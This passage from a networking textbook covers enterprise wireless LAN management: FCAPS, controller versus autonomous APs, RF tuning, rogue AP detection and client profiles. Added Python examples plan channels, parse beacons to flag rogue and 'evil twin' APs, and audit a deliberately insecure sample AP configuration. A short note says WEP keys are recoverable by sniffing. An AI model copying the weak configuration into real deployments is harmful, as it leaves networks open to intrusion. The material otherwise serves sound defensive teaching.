network, but you monitor the physical equipment and medium rather than users. In the performance
management functional area, you collect data on network resource utilization, set thresholds for
reporting and alerting, and make changes to fine-tune the network. Performance management can be as
simple as monitoring CPU or network interface utilization or as complex as full end-to-end application
monitoring. The concept is simple, however: Monitor the network, identify problems or chokepoints, and
fine-tune the environment.

Security Management
The security management functional area of FCAPS defines the process and procedures for network
security. The network is monitored for compliance to the security posture, risks are identified, events are
logged, and audit trails are created.

Where FCAPS Fails


FCAPS addresses management in the traditional environment, which typically means a wired network
with a clearly defined hierarchical architecture, static endpoints and deterministic behavior. Unlike
WLANs, relatively few external factors can affect a wired environment.
Wireless networks, on the other hand, are subject to many outside factors, and the endpoints (that is,
the wireless client devices) are mobile in nature. They can change their location, their IP address, and
even the status of their connectivity (online versus offline) on a regular basis in the dynamic radio
environment. The dynamic nature of clients' connectivity often does not represent a fault. Because of the
lack of any specific client management area in the FCAPS model and the fluid nondeterministic nature of
WLANs in general, FCAPS should not be considered a comprehensive system for wireless management.
Instead, FCAPS is useful in helping you focus on the traditional areas that require attention. It can be
considered a subset of a robust enterprise-class wireless network management framework. FCAPS is a
useful tool, but you should not use it as the sole method for conceptualizing and even designing your
management toolset.

Comparing Centralized and Distributed Management


Historically, WLANs have been approached in a manner similar to wired networks. Because the access
points were deemed access layer devices, or edge devices, they were considered no differently from a
typical Layer 2 switch. Both provided connectivity to the network, after all.
Most enterprise networks rely upon intelligent devices. This includes access layer switches and
(historically, once again) access points. Control and management were provided "at the edge," so the
devices required a degree of intelligence, that is, configurability and manageability. The access points
were considered "intelligent" or "autonomous" because they were effectively standalone devices. Each
access point stored all the features, settings, and configuration and acted as a unique, intelligent host on
the network. In other words, if you had a WLAN with 25 access points, you had to configure and manage
each of the 25 devices. The rest of the network infrastructure (the switches to which the APs were
connected) did not require wireless-specific awareness. This is the so-called distributed model, also
known as the autonomous AP architecture, and many products and manufacturers still use this
framework.
Recently the centralized model, commonly known as the thin AP or centralized AP architecture, has
gained popularity. This paradigm approaches WLAN intelligence differently. Instead of embedding the
intelligence into the access points themselves, it is centralized in the device to which the AP is
physically or logically attached. The attachment points are typically dedicated appliances (so-called
"wireless LAN controllers") that act as a centralized management system for the access points. The APs
are configured and managed not individually but centrally from these controllers. The trade-off is that
this model requires dedicated wireless controllers (or wireless switches).
Often, the WLAN controller automatically configures the access point settings entirely, obviating the
need for IT staff to configure each device with specific or distinct radio settings, for example. On the
other hand, this system sometimes results in reduced configurability, removing your IT staff's ability to
fine-tune or mold the wireless network to your particular needs. In these circumstances, you can disable
the automatic "self configuring" features while retaining the other benefits of the centralized model.
Both the centralized and distributed models have their advantages and disadvantages. The traditional,
distributed architecture provides a robust system that does not rely upon dedicated wireless appliances.
Access points can be installed anywhere on the WLAN, and each site (small offices, remote branches,
individual buildings) does not require additional equipment in the form of a dedicated controller. The
access points contain all the configuration and settings required and use common operating systems,
such as those already familiar to your IT support staff. A distributed model is very scalable because new
APs can be installed wherever you have a free Ethernet port.
The centralized "wireless switch" or "wireless controller" architecture simplifies deployment. Almost all
the wireless settings are configured centrally, and there is no (or reduced) need to configure each access
point. Many products that adopt this approach also include added features, such as VPN tunnel
termination, guest networking capabilities, and wireless intrusion detection systems. The wireless
management is provided by either the controller or, more often, another separate WLAN management
appliance. The centralized model can often make small or medium installations very easy to deploy. On
the other hand, the centralized model does not scale as well because it requires dedicated controllers for
each WLAN site and may even require several controllers for larger buildings or deployments. This can
rapidly become costly and a deployment challenge in its own right.
The manufacturer of the product that you select will most likely dictate whether you use a centralized or
distributed architecture. Some manufacturers, such as Cisco Systems, offer both. In either case, some
fundamental WLAN management strategies are necessary for both models, and neither obviates the
need for a carefully considered and robust management framework. Despite what any marketing or
sales people tell you, there will always be a need for a holistic approach that takes into account more
than just the simple "intelligence" or configurability of the access point.

WLAN Management
This section describes the particulars of wireless network management. You learn about the unique,
particular areas that you must address in your enterprise WLAN management strategy. As mentioned
previously, wireless networks are in some ways just another transport medium and can be considered in
the same way as traditional wired networks, but in other ways, they present their own challenges and
exhibit their own unique characteristics. This directly influences the manner in which you must manage
your WLANs.

RF Management
Management of the RF spectrum is the most obvious characteristic that is unique to the wireless
environment. Radio communications can present serious problems for a poorly designed network. As
such, the management of the RF spectrum is traditionally considered the most difficult and time-consuming
aspect of building a WLAN. You should ensure that your management toolset addresses each of the
following dimensions of RF management:
Channel allocation Your management toolset should be capable of assigning relevant channels;
these are dependent upon which IEEE standard you are using on a particular access point.
Transmit power Manage the transmit power of your access points. In many circumstances, you
will need to change the transmit power to address interference, extend access in poorly covered
rooms, or reduce power to prevent radio coverage from extending beyond the physical boundary of
your buildings, where it becomes reachable by a sniffer or an unauthorized client. Several WLAN
management solutions offer proactive, dynamic, or automatic tuning of transmit power. When several
access points use this in conjunction, the setup is often referred to as a self-healing WLAN: the
wireless network can detect areas of poor coverage or a failed access point and automatically
increase the power of the neighboring access points to fill the gap.
Interference detection Nearby WLANs installed by others, poorly shielded microwave ovens,
older analog wireless phones, and even baby monitors can create interference. Anything that
transmits in the 2.4-GHz or 5-GHz frequency range is a potential interfering device. You should be
able to detect interference and, ideally, locate it. You can achieve detection and location by using
native WLAN management features that some products offer or you can use standalone wireless
sniffers. These are usually handheld devices that IT engineers use to scan and analyze network
traffic. Your management strategy should take this into account regardless of the specific tool you
choose.

Note
Sniffing is the passive interception of network traffic, usually with a view to analyzing it later
to extract information from the captured data. Sniffing is possible on both wired and wireless
networks, but it is much easier in the latter because the sniffing device does not need to be
physically connected to the network. In the wireless environment, you need only a wireless card
(in monitor mode) to capture traffic transmitted by nearby access points or other client devices.
Sniffing can be undertaken with dedicated devices designed explicitly for that purpose or, more
commonly, by regular laptops or PDAs with special software. Sniffing is deemed to be "passive"
because the sniffing device does not need to send traffic or advertise its presence; it simply
"listens" to the network and stores any traffic it can hear, which also makes it very hard to detect.
IT professionals often use sniffing when they are troubleshooting network problems because the
capture and analysis of traffic allows careful and detailed examination of every packet. However,
many attackers also use sniffing in an attempt to gain access to a network: traffic is captured, and
the attacker attempts to read the data or to recover the keys that protect it. Robust encryption is
therefore essential for enterprise-class WLANs. WEP offers no real protection against a sniffer,
because its keys can be recovered from captured traffic; WPA is considerably stronger, and WPA2
(802.11i with AES-CCMP) is the current standard. Although it is very difficult to prevent sniffing,
traffic protected by strong encryption cannot be read without the key. Bear in mind that management
frames (beacons, probes, deauthentication) are sent in the clear regardless of the data encryption in
use, so a sniffer always sees which networks exist and which devices are talking to them.
A simple but useful analogy is to think of sniffing as "eavesdropping." In normal circumstances, it is
impossible to stop someone from listening to your conversation. But if you are talking in code, it
matters much less.

Rogue AP detection Rogue AP detection is a critical aspect of any WLAN management framework.
Often considered a security issue, rogue AP detection is usually (but not exclusively) achieved
through RF detection capabilities. This is provided either by the native WLAN management feature set
inherent in the product you select or, once again, by standalone or handheld wireless sniffer devices.
It should be noted that RF-based rogue AP detection should not be considered the only method of
identifying rogue APs, but rather one part of a multifaceted strategy (for example, wired-side checks
for unknown devices on switch ports complement it). This is discussed in more detail in Chapter 7,
"Security and Wireless LANs."
Location-based services (LBS) This term describes the features that allow a WLAN to track the
location and movement of wireless devices. These can be WLAN network adaptors in laptops, PDAs,
or wireless phones, or dedicated radio transmitters (often known as "asset tags") that are fixed to
equipment specifically to enable asset tracking. For example, in many hospitals, LBS is used to
track expensive diagnostic or medical equipment; in some manufacturing plants, LBS is used to
track the movement of forklift trucks or equipment as it moves around the factory floor. Wi-Fi
asset tags are often grouped under the heading of Radio Frequency Identification (RFID), but RFID is
a generic term that more often refers to cheaper, non-WLAN tag technologies used in the retail
market, and not every RFID system provides location tracking. WLAN-based LBS is best thought of as
one form of RFID-style asset tracking that runs on infrastructure you already own.
Wireless Intrusion Detection Systems (WIDS) WIDS are tools that allow you to identify
aberrant radio activity within your WLAN. They are a wireless-based version of the Intrusion
Detection System (IDS) used in wired networks to detect suspicious or security-compromising
activity. WIDS provide ongoing, continuous monitoring of the RF range, detecting threats, attacks,
and interference that spot checks or snapshots can overlook. WIDS can be implemented by
dedicated sensors, standalone handheld devices (which tend to be less useful because of their
intermittent use by IT staff), or by the native WLAN infrastructure itself; the access points
themselves can scan the airwaves while providing network connectivity to your users. WIDS can
detect rogue access points, denial of service (DoS) attacks, and insecure ad-hoc networks (peer-to-peer
WLANs that users configure with their own clients) that compromise security.
Visualization Because WLANs are very dynamic and nondeterministic in nature (radio cells can
change over time based upon transmission or a changing physical environment), IT staff can never
be certain of the coverage at a particular moment. To help combat this challenge, many WLAN
equipment manufacturers developed the concept of visualization. These reporting and monitoring
tools provide a map of your floor plan along with visual cues as to the size and location of radio
cells. The maps are called heat maps because they are similar to the colored maps used to show
varying levels of heat in oceanography or geographical sciences. Color is used to show the various
levels of signal strength.
Visualization is extremely useful for the IT organization. At one glance, your IT support staff can
see the current state of coverage (without having to walk around measuring it), the signal strength,
and any gaps or "holes" in the WLAN. Because floor plans and heat maps are very intuitive, this
system greatly enhances the speed and ease with which your support organization can
troubleshoot problems. Figure 8-2 is an example of a visualization tool. The different shades in the
"heat map" reflect differing signal strengths.

Figure 8-2. Example Visualization Tool Using Heat Maps
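The channel allocation and transmit power items above describe what an RF management toolset does without showing the mechanics. The following Python script is an added example (not code from the book or from any vendor's controller) that demonstrates both in miniature: a greedy channel plan over a constructed access point neighbor graph using the three non-overlapping 2.4-GHz channels, and the self-healing step that raises the neighbors' power when one AP fails. The neighbor graph, the power ceiling, and the step size are assumptions chosen for illustration.

```python
"""Greedy channel plan plus a self-healing power step for a small WLAN.
Added example, not code from the book.  The AP neighbor graph, the power
ceiling and the step size are constructed for illustration."""

CHANNELS_24GHZ = (1, 6, 11)             # non-overlapping 2.4 GHz channels (802.11b/g)
POWER_MAX_DBM, POWER_STEP_DBM = 17, 3   # assumed site ceiling and self-healing increment

# Constructed neighbor graph: an edge means the two APs hear each other well
# enough that sharing a channel would cause co-channel interference.
NEIGHBORS = {
    "AP1": {"AP2", "AP4", "AP5"},
    "AP2": {"AP1", "AP3", "AP5"},
    "AP3": {"AP2", "AP6"},
    "AP4": {"AP1", "AP5"},
    "AP5": {"AP1", "AP2", "AP4", "AP6"},
    "AP6": {"AP3", "AP5"},
}


def assign_channels(neighbors, channels=CHANNELS_24GHZ):
    """Greedy graph coloring: the most-constrained AP (highest degree) is
    placed first, and each AP takes the channel used by the fewest of its
    already-placed neighbors (ties broken by channel order)."""
    plan = {}
    for ap in sorted(neighbors, key=lambda a: (-len(neighbors[a]), a)):
        taken = [plan[n] for n in neighbors[ap] if n in plan]
        plan[ap] = min(channels, key=lambda ch: (taken.count(ch), channels.index(ch)))
    return plan


def co_channel_conflicts(plan, neighbors):
    """Neighboring AP pairs left on the same channel; an empty list is ideal."""
    pairs = {tuple(sorted((a, b))) for a in neighbors for b in neighbors[a]
             if plan[a] == plan[b]}
    return sorted(pairs)


def heal_coverage(failed_ap, neighbors, power, step=POWER_STEP_DBM, ceiling=POWER_MAX_DBM):
    """Self-healing: mark the failed AP as off and step its neighbors up to
    fill the hole, never exceeding the site ceiling.  Returns a new power map."""
    healed = dict(power)
    healed[failed_ap] = 0
    for n in neighbors[failed_ap]:
        healed[n] = min(power[n] + step, ceiling)
    return healed


if __name__ == "__main__":
    plan = assign_channels(NEIGHBORS)
    print("channel plan:", plan, "conflicts:", co_channel_conflicts(plan, NEIGHBORS))
    power = {ap: 11 for ap in NEIGHBORS}
    print("after AP5 fails:", heal_coverage("AP5", NEIGHBORS, power))
```

On the sample graph the plan uses all three channels with no co-channel neighbors; a denser graph would leave conflicts, which is exactly the list you hand to the person deciding where to add a 5-GHz radio. A real controller builds the graph from measured signal levels between APs rather than a yes/no adjacency, but the colouring and the power step are the same idea.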



Note
Many of the preceding RF management issues are addressed or managed in a centralized
manner by the wireless switch products or the dedicated WLAN management appliances
offered by most enterprise-class solutions. In many cases, you will configure these
settings once on the WLAN controller or even allow the WLAN controller to configure
these options automatically for you. Alternatively, you might create templates and
automate the configuration of the APs, leaving the management appliance to
automatically configure the access points. This option reduces management costs but
takes control away from your IT staff. In small to medium deployments, and even in
some large environments, the operational cost savings can be significant.
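The sniffing note and the rogue AP detection and WIDS items above describe what a sensor sees and how the results feed the friendly/rogue/remediate triage from the previous section. The following Python script is an added example (not code from the book or from any vendor's WIDS) that parses 802.11 beacon frames, which are always sent in the clear, and classifies each advertised BSSID against an AP inventory. The beacons, the inventory, and the corporate SSID are constructed for illustration; the frame layout follows the 802.11 management frame format.

```python
"""Parse 802.11 beacon frames and sort the advertising APs into authorized,
friendly, rogue or remediate.  Added example, not code from the book; the
inventory and the beacons are constructed for illustration."""
import struct

BROADCAST = bytes.fromhex("ffffffffffff")
CAP_ESS, CAP_PRIVACY = 0x0001, 0x0010             # capability-info bits
TAG_SSID, TAG_DS, TAG_RSN, TAG_VENDOR = 0, 3, 48, 221
WPA1_OUI_TYPE = bytes.fromhex("0050f201")         # vendor IE marking pre-802.11i WPA
CCMP, AKM_8021X = bytes.fromhex("000fac04"), bytes.fromhex("000fac01")
TKIP_WPA1, AKM_WPA1_8021X = bytes.fromhex("0050f202"), bytes.fromhex("0050f201")

def build_beacon(bssid, ssid, channel, security):
    """Assemble a minimal beacon: 24-byte MAC header, 12 bytes of fixed fields,
    then information elements.  security is 'open', 'wep', 'wpa' or 'wpa2'."""
    mac = bytes.fromhex(bssid.replace(":", ""))
    cap = CAP_ESS | (0 if security == "open" else CAP_PRIVACY)
    frame = struct.pack("<HH6s6s6sH", 0x0080, 0, BROADCAST, mac, mac, 0)
    frame += struct.pack("<QHH", 0, 100, cap)       # timestamp, beacon interval, capability
    frame += bytes([TAG_SSID, len(ssid)]) + ssid.encode()
    frame += bytes([TAG_DS, 1, channel])
    one = struct.pack("<H", 1)
    if security == "wpa2":                          # RSN IE: version, group, pairwise, AKM
        rsn = one + CCMP + one + CCMP + one + AKM_8021X
        frame += bytes([TAG_RSN, len(rsn)]) + rsn
    elif security == "wpa":                         # WPA vendor IE with the same layout
        wpa = WPA1_OUI_TYPE + one + TKIP_WPA1 + one + TKIP_WPA1 + one + AKM_WPA1_8021X
        frame += bytes([TAG_VENDOR, len(wpa)]) + wpa
    return frame

def parse_beacon(frame):
    """Extract what a WIDS sensor cares about.  Non-beacons and frames whose
    IEs run past the end are rejected rather than crashing the sensor."""
    if len(frame) < 36:
        raise ValueError("too short for a beacon")
    fc, _, _, _, bssid, _ = struct.unpack_from("<HH6s6s6sH", frame, 0)
    if (fc & 0x00FC) != 0x0080:                     # type 0 (management), subtype 8 (beacon)
        raise ValueError("not a beacon frame")
    _, _, cap = struct.unpack_from("<QHH", frame, 24)
    info = {"bssid": ":".join(f"{b:02x}" for b in bssid), "ssid": "", "channel": None,
            "rsn": False, "wpa": False}
    off = 36
    while off < len(frame):
        if off + 2 > len(frame):
            raise ValueError("truncated IE header")
        tag, length = frame[off], frame[off + 1]
        value = frame[off + 2:off + 2 + length]
        if len(value) != length:
            raise ValueError("IE length exceeds frame")
        if tag == TAG_SSID:
            info["ssid"] = value.decode("utf-8", "replace")
        elif tag == TAG_DS and length == 1:
            info["channel"] = value[0]
        elif tag == TAG_RSN:
            info["rsn"] = True
        elif tag == TAG_VENDOR and value[:4] == WPA1_OUI_TYPE:
            info["wpa"] = True
        off += 2 + length
    info["security"] = ("wpa2" if info["rsn"] else "wpa" if info["wpa"]
                        else "wep" if cap & CAP_PRIVACY else "open")
    return info

def classify(info, authorized, friendly, corporate_ssids):
    """authorized: {bssid: name} of IT-managed APs; friendly: {bssid: owner} of
    known third-party APs (labs, shared offices).  Returns (verdict, reason)."""
    bssid = info["bssid"]
    if bssid in authorized:
        if info["security"] != "wpa2":              # official AP with the wrong config
            return "remediate", f"{authorized[bssid]} advertises {info['security']}, policy requires wpa2"
        return "authorized", authorized[bssid]
    if bssid in friendly:
        return "friendly", friendly[bssid]
    if info["ssid"] in corporate_ssids:             # someone impersonating your SSID
        return "rogue-critical", "unknown BSSID advertising a corporate SSID"
    return "rogue", f"unknown {info['security']} AP on channel {info['channel']}"

def scan_report(frames, authorized, friendly, corporate_ssids):
    """One (bssid, ssid, verdict, reason) row per captured beacon."""
    rows = []
    for frame in frames:
        info = parse_beacon(frame)
        rows.append((info["bssid"], info["ssid"]) + classify(info, authorized, friendly, corporate_ssids))
    return rows

# Constructed inventory and "capture" for the demonstration.
AUTHORIZED = {"00:11:22:33:44:01": "AP-HQ-3F-01", "00:11:22:33:44:02": "AP-HQ-3F-02"}
FRIENDLY = {"00:aa:bb:cc:dd:01": "tenant AP, shared office floor 2"}
CORPORATE_SSIDS = {"CORP-WLAN"}
SAMPLE_FRAMES = [
    build_beacon("00:11:22:33:44:01", "CORP-WLAN", 1, "wpa2"),
    build_beacon("00:11:22:33:44:02", "CORP-WLAN", 11, "wep"),   # misconfigured official AP
    build_beacon("00:aa:bb:cc:dd:01", "TenantNet", 6, "wpa"),
    build_beacon("02:de:ad:be:ef:01", "CORP-WLAN", 6, "open"),   # evil twin of your SSID
    build_beacon("02:de:ad:be:ef:02", "linksys", 6, "open"),     # employee's home router
]

if __name__ == "__main__":
    for row in scan_report(SAMPLE_FRAMES, AUTHORIZED, FRIENDLY, CORPORATE_SSIDS):
        print("%-17s  %-10s  %-14s  %s" % row)
```

Two points worth noting. First, the parser validates every information element length before using it; a sensor that trusts attacker-supplied lengths is itself a target. Second, the inventory lookup keys on the BSSID, not the SSID: an unknown BSSID advertising your corporate SSID is the case that deserves the highest priority, because it is how a honeypot AP lures your clients.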

Host Management
All IT and network support staff should be familiar with host management. In many ways, this is the
easiest area of WLAN management. Depending upon the architecture of your WLAN (centralized versus
distributed), you might need to manage every individual access point, or you might be able to use a
centralized management toolset.
Most enterprise-class WLAN equipment now offers dedicated WLAN management appliances. This is true
for not only the centralized models but also the distributed intelligent AP models. The Cisco Wireless
Control System (WCS) is an example of a dedicated WLAN management appliance.
With host management, you must consider issues such as the following:
Access point configuration
- IP address
- Host name
- SSID(s)
- VLAN(s)
Security settings
- EAP mechanism
- Encryption protocol
- AAA settings
RF settings
- Transmission power
- Frequency band (802.11a, 802.11b, 802.11g)
- Channel allocation
Managing the equipment
- Firmware management

- Image (or operating system) management
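The host management checklist above is only useful if something actually compares each access point against it. The following Python script is an added example (not code from the book or from Cisco) that audits an autonomous AP configuration against an assumed site baseline covering the security settings (EAP, key management, cipher, AAA, SNMP) and the RF settings (channel plan, power cap) listed above. The two configurations are constructed for illustration and modeled on Cisco IOS access point syntax; the regular expressions would need adjusting for another platform.

```python
"""Audit autonomous-AP configurations against a baseline.  Added example, not
code from the book.  The two configurations are constructed and modeled on
Cisco IOS access-point syntax; adjust the patterns for your own platform."""
import re

BASELINE = {"allowed_channels": {1, 6, 11}, "max_power_dbm": 14,          # assumed site policy
            "open_ssids": {"GUEST"}, "bad_snmp": {"public", "private"}}   # guest may be open

def parse_config(text):
    """Split an IOS-style config into hostname, per-SSID and per-radio blocks
    (indented lines) and global lines.  Any unindented line ends a block."""
    cfg = {"hostname": None, "ssids": {}, "radios": {}, "global": []}
    block = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):
            continue
        if raw.startswith(" "):                 # continuation of the current block
            if block is not None:
                block.append(line)
            continue
        m = re.match(r"dot11 ssid (\S+)$", line) or re.match(r"interface (Dot11Radio\S+)$", line)
        if m:
            block = cfg["ssids" if line.startswith("dot11") else "radios"].setdefault(m.group(1), [])
            continue
        block = None
        if line.startswith("hostname "):
            cfg["hostname"] = line.split(None, 1)[1]
        cfg["global"].append(line)
    return cfg

def audit(text, baseline=BASELINE):
    """Return (hostname, severity, finding) tuples; an empty list means compliant."""
    cfg = parse_config(text)
    host = cfg["hostname"] or "<no hostname>"
    out = []
    if "aaa new-model" not in cfg["global"]:
        out.append((host, "HIGH", "AAA not enabled; 802.1X/EAP cannot be authenticated against RADIUS"))
    for line in cfg["global"]:
        m = re.match(r"snmp-server community (\S+)(?: (RO|RW))?", line)
        if m and (m.group(1).lower() in baseline["bad_snmp"] or m.group(2) == "RW"):
            out.append((host, "HIGH", f"SNMP community '{m.group(1)}' is default or read-write"))
    for ssid, lines in cfg["ssids"].items():
        if ssid in baseline["open_ssids"]:          # open is allowed only on an isolated VLAN
            if not any(l.startswith("vlan ") for l in lines):
                out.append((host, "MEDIUM", f"SSID {ssid}: open SSID not isolated on its own VLAN"))
            continue
        if not any(re.match(r"authentication (open|network-eap) .*\beap\b", l) for l in lines):
            out.append((host, "HIGH", f"SSID {ssid}: no EAP authentication configured"))
        kmgmt = next((l for l in lines if l.startswith("authentication key-management")), "none")
        if "version 2" not in kmgmt:
            out.append((host, "HIGH", f"SSID {ssid}: WPA2 key management not enforced ({kmgmt})"))
    for radio, lines in cfg["radios"].items():
        for l in lines:
            m = re.match(r"encryption(?: vlan (\d+))? mode (wep|ciphers) ?(.*)", l)
            if m and (m.group(2) == "wep" or set(m.group(3).split()) != {"aes-ccm"}):
                out.append((host, "HIGH", f"{radio} vlan {m.group(1) or 'default'}: "
                                          f"'{m.group(2)} {m.group(3)}' is weaker than AES-CCMP only"))
            m = re.match(r"channel (\d+)$", l)
            if m and int(m.group(1)) not in baseline["allowed_channels"]:
                out.append((host, "LOW", f"{radio}: channel {m.group(1)} is outside the site channel plan"))
            m = re.match(r"power local (\d+)$", l)
            if m and int(m.group(1)) > baseline["max_power_dbm"]:
                out.append((host, "MEDIUM", f"{radio}: {m.group(1)} dBm exceeds the {baseline['max_power_dbm']} dBm limit"))
    return out

# Constructed sample: the same AP before and after remediation.
WEAK_CONFIG = """\
hostname ap-hq-3f-02
dot11 ssid CORP-WLAN
   vlan 10
   authentication open
   authentication key-management wpa
dot11 ssid GUEST
   authentication open
interface Dot11Radio0
 encryption vlan 10 mode ciphers tkip
 power local 20
 channel 3
snmp-server community public RW
"""

HARDENED_CONFIG = """\
hostname ap-hq-3f-02
aaa new-model
dot11 ssid CORP-WLAN
   vlan 10
   authentication open eap eap_methods
   authentication key-management wpa version 2
dot11 ssid GUEST
   vlan 20
   authentication open
interface Dot11Radio0
 encryption vlan 10 mode ciphers aes-ccm
 power local 14
 channel 6
snmp-server community Wl4n-r3ad-0nly RO
"""

if __name__ == "__main__":
    for finding in audit(WEAK_CONFIG):
        print("%s  %-6s %s" % finding)
    print("hardened:", audit(HARDENED_CONFIG))
```

Run against the weak configuration it produces eight findings (five of them high severity) and against the hardened one none. In practice you would pull the running configurations through your management appliance or over SSH and run the audit on a schedule, so that an AP that has drifted from the standard shows up as a "remediate" item rather than waiting for the next rogue sweep to notice it.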

Client Management
Client management is one of the hidden challenges in supporting a wireless network. Unlike the wired
environment, where hosts are usually static and their interoperability and connectivity to the network are
well understood, WLANs tend to have a wide variety of clients that require ongoing monitoring,
management, and support. For example, as WLAN security standards evolve, the various client adaptors
often need software and firmware updates to keep abreast of these new developments. Wireless devices
also usually need specific WLAN client software. This is especially true if you require functionality beyond
that provided by the native supplicants of modern operating systems such as Windows XP or Mac OS.
In a typical WLAN environment, you have to support several operating systems, different makes and
models of laptop (each with different wireless adaptors), and many wireless devices (such as mobile
barcode readers, wireless VoIP handsets, or embedded wireless intelligent systems in manufacturing or
factory equipment). The combination of these different endpoints, from different manufacturers and
each running different software, makes ensuring a stable, consistent, and secure environment a
challenging task.
Your wireless management strategy cannot afford to ignore these unique requirements. WLAN client
management is often overlooked when large-scale enterprise deployments are undertaken, resulting in a
haphazard, costly, and reactive approach that doesn't effectively support those hundreds or thousands
of devices.
Many wireless client software packages come with their own management application. The application centrally
defines and distributes profiles, updates client security postures, and even polls devices for reporting
information. However, in the typical heterogeneous environment, using a single standard hardware
adaptor and software client is not possible. In these circumstances, you have two choices: You can
accept the inevitable burden of supporting and managing disparate wireless platforms, or you can adopt
a third-party cross-platform wireless software client.
Companies such as Meetinghouse Data Communications (http://www.mtghouse.com) provide wireless
client software that is supported on a variety of operating systems and on the most common wireless
adaptors. Additionally, they provide comprehensive client management features, including centralized
profile management and client configuration, which is discussed in more detail later. Many companies
have adopted these cross-platform clients because of these features.
Another nonexclusive option is the use of client management tools that your enterprise might have
already deployed to help support existing computer systems. Tools such as Microsoft SMS and Altiris
Client and Mobile Manager allow you to distribute software and applications to your end-user devices.
These tools can help manage your clients, but they might not address the wireless-specific requirements
such as profile creation and updating.
Finally, the need to flash adaptor firmware is an uncommon occurrence. However, it is sometimes
required, and you should therefore plan for it accordingly. Flashing the firmware updates the
"embedded" software on the adaptors. This is sometimes necessary when the manufacturer distributes
bug fixes or new features. Ensuring that your cards have the latest firmware before or during the
installation is highly recommended (see Chapter 6, "Wireless LAN Deployment Considerations").

Challenges Unique to WLAN Management


WLANs present several unique management challenges. Many relate to the physical aspects of the
wireless environment, whereas some are the result of the dynamic nature of the wireless network and its
mobile users and devices. Knowledge of these challenges will help ensure that you do not overlook these
areas in framing your management strategy for the enterprise-class WLAN. Some of the most commonly
experienced problems and challenges you will face include the following:
The dynamic nature of the transparent medium
The mobility of endpoints
The persistence of endpoints
The nature of mobile endpoints
Wireless security management
These challenges are fundamental in nature and simply characteristic of the wireless environment. None
is insurmountable, and examining each in turn can assist in addressing them in your management
strategy.

Dynamic Nature of the Transport Medium


Wired networks are deterministic in nature. That is, they function on a predictable basis with very little
outside influence on their operation. Wireless LANs, on the other hand, can be considered statistical or
probabilistic in nature. As mentioned in the introduction to this chapter, the wireless LAN will function
differently depending upon the number of users associated to a particular access point, the amount of
traffic generated by those users and devices, and outside interference, either from nearby but external
networks or from factors such as the physical environment.
Most enterprise-class WLANs are made up of several access points providing large areas of coverage in
one or more buildings. However, the dynamic nature of the transport medium, the RF spectrum upon
which 802.11 WLANs are based, means that one cell will by its very nature have different characteristics
from another cell. This can even be the case in the same building. The cell's size and shape are
dependent not only on the transmission power of the access point but also on such effects as the
composition of walls and floors, the location of physical obstacles such as furniture, the existence of
other nearby devices using similar radio frequencies, and so on.
A carefully designed WLAN is capable of withstanding the vast majority of these effects. However, the
fact remains that a wireless LAN's behavior is isolated in both time and space. Appreciation of this fact
prepares the network manager to face these challenges and to ensure that the tools he or she puts in
place can help identify unique radio-based problems, often before they negatively impact the end users.

Mobility of Endpoints
WLANs enable and promote mobility. Thus, at any point in time, a mobile device could be at any location
on the network. Mobile devices, such as laptops, PDAs, or even wireless-equipped vehicles or
manufacturing equipment, can roam from access point to access point. In a wired environment, the
network manager (or network management toolset) knows and can predict where a particular endpoint
is. In the vast majority of cases, endpoints are literally "wired" to a jack and, in turn, a switched port on
your networking infrastructure. That is not so in the wireless LAN. Devices move about the building,
campus, or factory floor. Without specific tools or reports, it is often difficult, or even impossible, to
identify a wireless device's location. Indeed, they will often change IP addresses on a daily basis,
sometimes more often. Layer 3 (inter-subnet) roaming results in the client being assigned a new IP
address.

Intermittent Connectivity of Mobile Endpoints


Most wired networks are a collection of physically static devices that present a degree of "persistence" in
their connectivity. That is, they usually remain online and connected for long periods of time, if not
indefinitely.
In the wireless space, especially with the introduction of PDAs, Application-Specific Devices (ASD) such
as bar-code scanners, wireless voice handsets, and smart phones, wireless-enabled devices come online
and go offline on an irregular, unpredictable basis. Of course, that is not to say that all mobile devices
are going offline all the time, but rather the nature of many mobile devices (such as PDAs) is such that a
system cannot automatically assume they are online at a particular time.
Management tools and strategies that rely upon persistence of connectivity (the ability to reliably contact,
ping, identify, or locate end devices) will not handle such an environment well. A toolset that automatically
generates reports and alerts on hosts or devices that it can no longer contact might generate many
false-positive alerts or alarms, for example. Management tools that rely upon agents (or specific
management software) might create erroneous alerts if they cannot consistently contact these devices
on a predictable basis.

Diverse Nature of Wireless Endpoints


Remember that access points are not the only wireless devices on your network. Each client device is
also fitted with a radio and an antenna. So not only does your WLAN present you with the challenge of
dealing with many (sometimes hundreds or thousands) access points, but each client device also needs
to be dealt with.
Typically, an enterprise-class WLAN will standardize upon the infrastructure required for the WLAN; that
is, the design will detail what specific products are used, how the infrastructure devices are configured,
and so on. Such standardization is quite often not the case when it comes to client devices. There are
often many different makes and models of laptops or mobile devices within the company. Even laptops
that come with embedded wireless adaptors and that are manufactured by the same vendor will
sometimes have different radio interfaces. It is not uncommon for an enterprise to have a mixture of
different makes of laptops, different platforms (for example, Windows 2000, Windows XP, Linux, and
MacOS), different client adaptors, and differing versions of firmware and client software. Contrast this
with the wired network, where the vast majority of devices are easy to install; that is, you literally plug
them into the network and they work. You do not have to worry about whether the wireless network
adaptors have the latest firmware, whether the correct software application and version have been
installed, or whether the configuration of the software is completed and appropriate profiles have been
created.

Security Settings Management


Enterprise-class wireless networks should always have a robust security framework. This is discussed in
detail in Chapter 7. The typical security posture will detail not only the Extensible Authentication Protocol
(EAP) mechanism used for authentication and the encryption protocol used for data integrity, but also
fundamental characteristics such as the SSID.
Simply defining these protocols on the wireless infrastructure (the access points or WLAN controllers) is
not enough. You must also configure each client device with the correct settings. Each SSID/VLAN might
require different security postures. You might have separate virtual WLANs for voice, data, and guest
networking that each require different security settings. Many users will also have wireless at home or
will use public wireless services while traveling. These will also have different security requirements and
settings. In short, every WLAN client will almost certainly have multiple security postures.
To configure and manage the wide variety of devices and user groups correctly and appropriately, you
can use profiles, which are usually a collection of network and security settings required to ensure
connectivity. The wireless software on every device is configured with the correct security settings (for
example, SSID, EAP mechanism, and encryption protocol), which are then saved for repeated use. The
user can then simply select the appropriate profile for his or her current location.
For example, a typical user's laptop might have one or more profiles for the following:
Enterprise WLAN: Finance
Enterprise WLAN: Manufacturing
Home WLAN
Public Wireless Hotspot
Defining, configuring, and managing these profiles (the client's wireless security settings) must be done in a
scalable and supportable manner. If the security profile in your wireless network changes, you must
have an easy way to update the client devices appropriately. Manually reconfiguring hundreds or
thousands of devices is a costly and error-prone effort. The more client platforms you have, the more
difficult this task becomes.
